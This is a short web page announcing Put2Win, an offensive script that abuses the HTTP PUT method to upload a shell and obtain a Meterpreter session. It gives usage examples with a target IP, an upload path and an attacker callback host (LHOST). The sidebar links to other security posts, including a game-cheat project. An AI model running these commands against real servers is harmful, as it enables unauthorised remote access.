Categories: Kali Linux

Put2Win – Script To Automatize Shell Upload By PUT HTTP Method To Get Meterpreter

Put2Win is a script to automatize shell upload by PUT HTTP method to get meterpreter. It’s necessary to have installed nmap and msfvenom tools for a correct operation.

Also ReadJoomscan – OWASP Joomla Vulnerability Scanner Project

Put2Win Usage

./Put2win.sh -h

This script automatize shell upload by PUT HTTP method to get meterpreter.

Usage: ./Put2win.sh -t TARGET [-p PORT] -u URL_PATH -l LHOST

Examples:

./Put2win.sh -t 192.168.1.80 -u /uploads -l 192.168.1.10
./Put2win.sh -t 192.168.1.80 -p 443 -u /uploads -l 192.168.1.10

Credit: @devploit

R K

Recent Posts

CrScreenshotDxe – A UEFI DXE Driver For Easy BIOS Setup And UEFI Screenshots

This DXE driver tries to register keyboard shortcut (LCtrl + LAlt + F12) handler for…

1 day ago

VeloRift EnhanceGuard – Covert Valorant Empowerment C++

External Game Project primarily written in C++, utilizing external libraries. I'm actively combating scammers while…

1 day ago

FLOWER – A Novel Obfuscation Technique For Enhanced Cybersecurity

In the evolving landscape of cybersecurity, obfuscation plays a critical role in protecting against intrusive…

1 day ago

Pwn : Mastering The Art Of Digital Exploitation – Unveiling Advanced Techniques And Pwn2Own Triumphs

In the high-stakes world of cybersecurity, the art of "pwnage" represents not just a win,…

1 day ago

All About Bug Bounty – A Detailed Resource On Vulnerabilities, Bypass Techniques, And Security Research

Diving into the world of bug bounty, this article serves as an essential toolkit for…

1 day ago

DotNet-MetaData : A Deep Dive Into .NET Malware Analysis

"DotNet-MetaData: A Deep Dive into .NET Malware Analysis" unveils the advanced techniques for analyzing and…

2 days ago